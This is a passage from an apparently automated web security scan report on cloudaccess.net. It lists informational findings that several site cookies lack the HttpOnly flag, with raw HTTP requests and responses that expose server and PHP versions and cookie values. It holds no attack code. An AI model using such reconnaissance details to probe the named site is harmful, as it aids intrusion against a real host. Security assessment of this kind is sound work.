Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Fri, 31 Dec 2010 05:10:22 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.708. http://www.cloudaccess.net/joomla-training-videos.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/joomla-training-videos.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-training-videos.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Fri, 14 Jan 2011 20:36:34 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.709. http://www.cloudaccess.net/meet-our-team.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/meet-our-team.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /meet-our-team.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:54 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:37:23 GMT
Expires: Mon, 24 Jan 2011 14:07:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.710. http://www.cloudaccess.net/network-report.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/network-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-report.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:28:12 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.711. http://www.cloudaccess.net/network-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/network-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:51 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:52 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:51 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:52 GMT; path=/
Last-Modified: Tue, 30 Nov 1999 06:00:00 GMT
Expires: Mon, 24 Jan 2011 14:07:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.712. http://www.cloudaccess.net/pricing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/pricing.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pricing.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Sat, 22 Jan 2011 06:20:15 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.713. http://www.cloudaccess.net/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/privacy-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 17:55:06 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.714. http://www.cloudaccess.net/support-sla.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/support-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:52 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:53 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:52 GMT; path=/
